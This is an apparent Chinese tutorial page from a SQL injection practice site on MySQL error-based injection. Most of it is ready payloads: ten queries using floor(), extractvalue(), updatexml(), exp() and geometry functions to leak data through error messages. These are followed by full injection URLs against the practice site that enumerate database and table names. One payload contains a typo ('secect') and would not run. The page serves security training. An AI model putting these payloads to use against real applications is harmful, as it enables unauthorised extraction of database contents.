漏洞列表 >>> SQL注入系列

select * from article where id = 11

(调试信息,此颜色区域只为输出sql语句,让您更好的理解sql注入,正常网站不会在页面显示)

查询型报错注入
时间:2018-05-10 11:34:42
热度: 0
报错注入相关函数
1.floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));
报错 注入,有一个前提条件,就是执行sql语句的时候,
要加上mysqli_error()函数
如下:
$result = mysqli_query($conn,$sql) or die(mysqli_error($conn));
练习地址:左侧导航栏最下方,
http://xss.tv/sql-article/addarticle.php
爆出注入函数
获取有多少个数据库
http://xss.tv/sql-article/showarticle.php?id=1319' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,count(schema_name),0x7e) from information_schema.schemata)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

通过limit 获取所有数据库名
http://xss.tv/sql-article/showarticle.php?id=1319' and (select 1 from(select count(*),concat((select (select (select concat(0x7e, schema_name, 0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- -
2、通过ExtractValue报错
and extractvalue(1, payload)
http://xss.tv/sql-article/showarticle.php?id=1319' and extractvalue(1, concat(0x7e,(select @@version),0x7e)) and updatexml(1,concat(0x23,(select table_name from information_schema.tables where table_schema='newblog' limit 0,1),0x23),1)-- -
-- -
3、通过UpdateXML报错
+and updatexml(1,payload,1)
http://xss.tv/sql-article/showarticle.php?id=1319' and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)-- -